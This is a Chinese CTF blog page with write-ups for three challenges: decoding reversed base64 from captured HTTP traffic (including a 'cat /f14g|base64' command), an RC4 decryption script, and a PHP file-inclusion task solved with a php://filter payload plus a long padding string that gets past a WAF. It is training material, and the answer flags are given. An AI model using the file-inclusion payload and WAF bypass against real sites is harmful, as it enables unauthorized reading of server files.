当前位置：首页 > news >正文

[GKCTF 2021]签到

news 文章来源：https://blog.csdn.net/ming20211016/article/details/144070863 2025/1/15 6:52:52

[GKCTF 2021]签到

wireshark跟踪http流，基本编解码，倒叙，栅栏密码

找到cat /f14g

把包里返回的字符串先hex解码，再base64解码，看到一个时间是倒叙，不含flag

继续往下面翻，可以看到cat+%2Ff14g%7Cbase64的包

继续解码，发现像base64编码后的字符串，但是直接解码无法得到想要的结果

观察最后一行结合上一个解码出来的含有时间倒叙的字符串，可推断，字符串被镜像倒叙了利用python，编写exp


a="""wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD
jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM
t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0iCNMyIjMyIjMyIjMyI
6AjMgAzMtMDMtEjMwIjO0eZ62ep5K0wKrQWYwVGdv5EItAiM1Aydl5mK6M6jlfpqnrQDt0SLt0SL
t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLK0AIdZavo75mlvlCNMTM6EDM
z0yMw0SMyAjM6Q7lpb7lmrQDrsCZhBXZ09mTg0CIyUDI3VmbqozoPW+lqeuCN0SLt0SLt0SLt0SL
sxWZld1V913e7d2ZhFGbsZmZg0lp9iunbW+Wg0lp9iunbW+Wg0lp9iunbW+WK0wMxoTMwoDMyACM
DN0QDN0QDlWazNXMx0Wbf9lRGRDNDN0ard0Rf9VZl1WbwADIdRampDKilvFIdRampDKilvVKpM2Y
==QIhM0QDN0Q
"""a1 = a.split("\n")
# print(a1)a2=""
for i in a1:a2+=i[::-1]print(i[::-1])# print(a2)
# print(i[::-1])
import base64
a3=base64.b64decode(a2)
# print(a3)
# print("==========\n")
# print("==========\n")
print(a3.decode())# flag{Welc0me_GkC4F_m1siCCCCCC!}
# NSSCTF{Welc0me_GkC4F_m1siCCCCCC!}

NSSCTF{Welc0me_GkC4F_m1siCCCCCC!}

[SWPUCTF 2021 新生赛]简简单单的解密

解密步骤应该是：
URL解码
Base64解码
RC4解密（因为RC4是对称加密，使用相同密钥可以解密）

从给定的URL码进行反推

enc = "%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA"

import base64, urllib.parse# 已知参数
key = "HereIsFlagggg"
enc = "%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA"# URL解码
dec = urllib.parse.unquote(enc)# RC4解密函数
def rc4_decrypt(key, cipher):# 初始化S盒s_box = list(range(256))j = 0for i in range(256):j = (j + s_box[i] + ord(key[i % len(key)])) % 256s_box[i], s_box[j] = s_box[j], s_box[i]# 解密res = []i = j = 0for c in cipher:i = (i + 1) % 256j = (j + s_box[i]) % 256s_box[i], s_box[j] = s_box[j], s_box[i]t = (s_box[i] + s_box[j]) % 256k = s_box[t]res.append(chr(ord(c) ^ k))return ''.join(res)# 执行解密
flag = rc4_decrypt(key, dec)
print("解密结果：", flag)

NSSCTF{REAL_EZ_RC4}

[鹏城杯 2022]简单包含

我们传参试试

flag=php://filter/read=convert.base64-encode/resource=flag.php

然后出现了一个waf

那我们再换一个思路，先查看它的源代码

flag=php://filter/read=convert.base64-encode/resource=index.php

我们去解密一下

这个代码是让我们再伪协议前面加上800个字符才能访问

a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

我们去解密一下

NSSCTF{f0207dc4-47d0-42e2-9768-61a90831ee74}